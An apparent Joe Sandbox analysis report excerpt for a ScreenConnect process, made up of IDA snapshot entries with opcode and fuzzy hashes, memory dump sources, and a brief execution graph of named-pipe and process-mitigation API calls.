                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2319fd05218e6ae2905e1ff0c3113bbe814c66d856eeebd1a44b69077152d7a7
                                                                                                                                                                                                                                                        • Instruction ID: 7802e76ac1fb85de33238fec25169063df99611c4a62affadfa4385aec664e1e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2319fd05218e6ae2905e1ff0c3113bbe814c66d856eeebd1a44b69077152d7a7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5F08C72A093449FC318CFBA9C0068A7FEADFC6224B0981BB900CC3640E928A9018725
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 47780800e2c473c526205e0409d707bc749f40fd8f00de6a7e36a9b2e7f4dbfa
                                                                                                                                                                                                                                                        • Instruction ID: 04eef7376db58ca6f3de5bbd836aa6651751d09513559135fd131a80f8199e42
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47780800e2c473c526205e0409d707bc749f40fd8f00de6a7e36a9b2e7f4dbfa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2F09B3350E2905FC7264A799C945953F79DEC726031E01E7D449C7343C5199C0EC771
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2eceaf9fbcad482bbe0c01ab5eefb2736d961b9f00eb7de3a42369ebe03b72b0
                                                                                                                                                                                                                                                        • Instruction ID: 0837337a8f50134b2abe20446da9b8e665bc478e46fbbea66af429af5f127fdd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2eceaf9fbcad482bbe0c01ab5eefb2736d961b9f00eb7de3a42369ebe03b72b0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DDF05C363043804FC71A6BBEA4946697FE6DBCA66175C407EE505C7352CD344C498775
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ba8aac4c0cf66d3fdaf494e7c9de092cc1c3cad263cab6ac9a78c90de500d8e2
                                                                                                                                                                                                                                                        • Instruction ID: 9211c5b6e97e45b5dcf32710d6d9118bd2769a35c40873f7d7a1cecc03f8b694
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba8aac4c0cf66d3fdaf494e7c9de092cc1c3cad263cab6ac9a78c90de500d8e2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3CF090316083815BC7026774A81449E7FA5DEC2320B1485BFD046CB392DA668C0A8BE5
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a9abdeaf74b78c4c7ee7ebc6940b5f08a0c5ea10734e28c2f5ad0e962218e03b
                                                                                                                                                                                                                                                        • Instruction ID: 8ff1b484109cfbed99ed6997ff770ec57baefb5f61cf94238e645ed4cf249b47
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9abdeaf74b78c4c7ee7ebc6940b5f08a0c5ea10734e28c2f5ad0e962218e03b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2FF03270E0024CEFCB04EFA8D995A9CBBB8FB44340F2440A9C805EB250DB30AF84CB56
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4aaad8e7140562013835ac47f3110a193a56b5fc664461360d0113483d025d37
                                                                                                                                                                                                                                                        • Instruction ID: 8934a637c6256d1863cf915113e9e9be92bbdb7b9778c6e61ac0dbc554172412
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4aaad8e7140562013835ac47f3110a193a56b5fc664461360d0113483d025d37
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1F04930D09288EFCB05DFA8D88169CBFB0EF46341F2841AAC405E7251DB306F44DB12
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 29997141221cb69e0635af09f0cf5564236e3fc75d42b5472108654aa251a16b
                                                                                                                                                                                                                                                        • Instruction ID: 3d37d5d0da37e94689e9abc2ee006f4f6075e28c834c57230370503dede0dd17
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29997141221cb69e0635af09f0cf5564236e3fc75d42b5472108654aa251a16b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02F05E30B00218CFC759DF69D554AAEBBE5EF88350705806AE909DB378EB34DD01CB90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1994b56c82164ae919f3d381b991d8fe1a39d901b70ddd6df34a7045fbe97199
                                                                                                                                                                                                                                                        • Instruction ID: 799963e69fcc96d77754c9f9d59b554e1923f91ef37c0154d6fc32391dece8a7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1994b56c82164ae919f3d381b991d8fe1a39d901b70ddd6df34a7045fbe97199
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09E065357041086B4704DA4ED400D5BBBAEEFC8320714C02BF809CB345DA31DD1287B4
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0EE09231209A854FC716DBACF841A8E3BF5EFCA250B1809AAE4418B167CB64B94987D5
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3cef936298361c1e83ff61793868bf4f88b3532ecdbe52337d56b94f939f7dd0
                                                                                                                                                                                                                                                        • Instruction ID: 08043dabb41442efa44df99f7920e3ccfedfd01fbfdf51dcd7002b0b48ea368b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3cef936298361c1e83ff61793868bf4f88b3532ecdbe52337d56b94f939f7dd0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 33E0DF714442408FC309DB3CE8C92C8BFE0EB42325B89099EC1C18BB11CB38A4479792
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ce062bf70144992b87e9c6797a370129ee15cdb1e3905a2f6ca945bab1bf6b0a
                                                                                                                                                                                                                                                        • Instruction ID: 3306324ea8d2efad4ff458ebb380238703fcba18d93d9a48172931456a0ba616
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce062bf70144992b87e9c6797a370129ee15cdb1e3905a2f6ca945bab1bf6b0a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58E04F75D45288DFCB05DFB8E952A4E7BF4EF4A200B1245EAD804D7362EB315E14DB41
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7e2cdaad15811d183bb54d176d33271da779b832c97bd6164e2a05f40b0258a6
                                                                                                                                                                                                                                                        • Instruction ID: a9db68b8bb16c856db2150d41ec5010aaea8337e0b956b68cfee5e048f97eab5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e2cdaad15811d183bb54d176d33271da779b832c97bd6164e2a05f40b0258a6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11E08631924748CFCB02EF7CC4A94ECBBB1EFD5200B09868FD4856B262EB309494D751
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7a6b68e8c73298f4af5214181afb58b4f66a38ab95f600ecf3934736f6525fd9
                                                                                                                                                                                                                                                        • Instruction ID: 3cb3829f845f7b6974a7919fdfce90200b333a05a329f4f892662a4d8e2e40fd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a6b68e8c73298f4af5214181afb58b4f66a38ab95f600ecf3934736f6525fd9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8D05E74A0124CEFCB05EFB8E901A5EB7F9EB85204B1185E9DC08D3300EB326F049B81
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3dc157396b50ef292faffd0a7c99bd93729a36be50ce304c4517cf343338d8ff
                                                                                                                                                                                                                                                        • Instruction ID: 3c27ea6fda89fc0532cbb29359a8d27a516f30b72d7f7f82cd0b1b763efc8be1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3dc157396b50ef292faffd0a7c99bd93729a36be50ce304c4517cf343338d8ff
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7ED0923410A7518FC751DB20C891491BBB1AF5A224319C8EED4458F6A2CA36AC07EB11
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4e509b01482dd5ecf2914371db006be911634fdadde9ab63bccfb4e3a94a56e2
                                                                                                                                                                                                                                                        • Instruction ID: 0a087b9e8cb5a7c5bc927cd1e71eda3f4d3e13225e3656941885881523d329dd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4e509b01482dd5ecf2914371db006be911634fdadde9ab63bccfb4e3a94a56e2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13C012257450100FD249C158E850615A7D28BD9755F28D4679518C76A6C921DD038244
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ea501a51658f656245c26cbe0616150cf74d14d83bc8d4b5a06c3207a135a5ac
                                                                                                                                                                                                                                                        • Instruction ID: b67baea4247ff083709d8b400a36425c3b47df21d70d06bbe04aa396fb9e6a51
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea501a51658f656245c26cbe0616150cf74d14d83bc8d4b5a06c3207a135a5ac
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2AD0C73182470DC9C704BB78D455469B778EED5200F00D65AE44967121FF70D5D0D691
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c4e48583c91ef4ac8c9a19811a9a0c15ff64c95334fc57918c729e9e73244c52
                                                                                                                                                                                                                                                        • Instruction ID: 9cdd3cf3e09636fe235351053cb165eec7f4c56ed68d3a8e0f8d526a4d697ec1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c4e48583c91ef4ac8c9a19811a9a0c15ff64c95334fc57918c729e9e73244c52
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16C04C304283448FDF01EF65ECC8A407BF2EB593413241093D005C7315D6309840DF35
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ;$K$[$[
                                                                                                                                                                                                                                                        • API String ID: 0-2650379400
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ;$K$[$[
                                                                                                                                                                                                                                                        • API String ID: 0-2650379400

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:11%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                        Signature Coverage:27.3%
                                                                                                                                                                                                                                                        Total number of Nodes:11
                                                                                                                                                                                                                                                        Total number of Limit Nodes:1
                                                                                                                                                                                                                                                        execution_graph 12075 7ff848e5365b 12076 7ff848e53650 ConnectNamedPipe 12075->12076 12078 7ff848e75862 12076->12078 12083 7ff848e58014 12085 7ff848e5801d 12083->12085 12084 7ff848e58082 12085->12084 12086 7ff848e580f6 SetProcessMitigationPolicy 12085->12086 12087 7ff848e58152 12086->12087 12079 7ff848e53632 12080 7ff848e75610 CreateNamedPipeW 12079->12080 12082 7ff848e75743 12080->12082
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 0]H$8]H
                                                                                                                                                                                                                                                        • API String ID: 0-1485892393

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: @]H$H
                                                                                                                                                                                                                                                        • API String ID: 0-1665581402

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: (]H
                                                                                                                                                                                                                                                        • API String ID: 0-4090289302
                                                                                                                                                                                                                                                        • Opcode ID: 99025a315274298b8e2ac3f15deaa779531d9a13d7f58f32cd64d7313a693b64
                                                                                                                                                                                                                                                        • Instruction ID: 02a768a57a34b59f47d61e82f6ec5bc9f680632b5221aedb2469395770352075
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99025a315274298b8e2ac3f15deaa779531d9a13d7f58f32cd64d7313a693b64
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FED1C431E1DA8B4FE7BABA2884656B966D2EF943D0F540179D44EC31C6DE3CBC428B41

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 956 7ff848e53632-7ff848e7567a 959 7ff848e7567c-7ff848e75681 956->959 960 7ff848e75684-7ff848e75741 CreateNamedPipeW 956->960 959->960 962 7ff848e75749-7ff848e7577c 960->962 963 7ff848e75743 960->963 963->962
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3297581500.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff848e50000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateNamedPipe
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2489174969-0
                                                                                                                                                                                                                                                        • Opcode ID: e00d11724740b9957021337f49bcb93f68df67259d6627c38d7d43e9eb1f7cad
                                                                                                                                                                                                                                                        • Instruction ID: 2a46478f7407c94c5549a0e2db31a1bccd69812663a3cf3a89b17058b69d821c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e00d11724740b9957021337f49bcb93f68df67259d6627c38d7d43e9eb1f7cad
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C151807191CA5C8FDB68EF5C9845BE9BBE0FB59710F1442AEE44DD3241DB70A8828BC1
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ]H
                                                                                                                                                                                                                                                        • API String ID: 0-530538235
                                                                                                                                                                                                                                                        • Opcode ID: d613954af35eb40c2020220ffb891996bb989b2402ccaff59afdd41b3f0be8fb
                                                                                                                                                                                                                                                        • Instruction ID: 53e5c10095a7096dba6f87ed1a823485e8288ec5b1e972c08fa3848a57ed2fc2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d613954af35eb40c2020220ffb891996bb989b2402ccaff59afdd41b3f0be8fb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7BD19331E1D98B8FEABABE2884556B966D2EF953D4F544079D40EC31C6DE3CBC028B41
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 468ef5aad1ae5d88152b91b4dd285ef62f3a782100f937d182fd67bff8fb71f8
                                                                                                                                                                                                                                                        • Instruction ID: d40e4b32b6a3b80885d1aad312aab58671d13f16de8952e51c8f7977b6ce1e78
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 468ef5aad1ae5d88152b91b4dd285ef62f3a782100f937d182fd67bff8fb71f8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67C1A331E1D98B4FE6AABA2884656B976D2EF943D4F94407DD04EC32C6DE3CBC418B41

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: (MH$PQH
                                                                                                                                                                                                                                                        • API String ID: 0-2614825812
                                                                                                                                                                                                                                                        • Opcode ID: 781dc277813b9905f61a6a356184cc438f22d04beb21d86986db1155b7d253e3
                                                                                                                                                                                                                                                        • Instruction ID: 0d2326f58d4af7e006ab82087814a25c0e765fd7c6381f12bf0761164e77374b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 781dc277813b9905f61a6a356184cc438f22d04beb21d86986db1155b7d253e3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5891F672E0C98A4FEBA9EF289855AB537E1FF55350B0405BDD44EC7196DE29FC028B80

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3297581500.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff848e50000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1088084561-0
                                                                                                                                                                                                                                                        • Opcode ID: f2ad7b4c54dfba9d9131cb23c34e06321f371cf1329de5666e26cdfbf0957611
                                                                                                                                                                                                                                                        • Instruction ID: ad99e4951ad287c153cb886ab72a57cb6a6af420ee71381f9409ce9d04f764e7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2ad7b4c54dfba9d9131cb23c34e06321f371cf1329de5666e26cdfbf0957611
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 81513771C0CB594FDB19ABA8984A5FABBE0EF56350F04017FE049C3192DF78A846CB91

                                                                                                                                                                                                                                                        Control-flow Graph

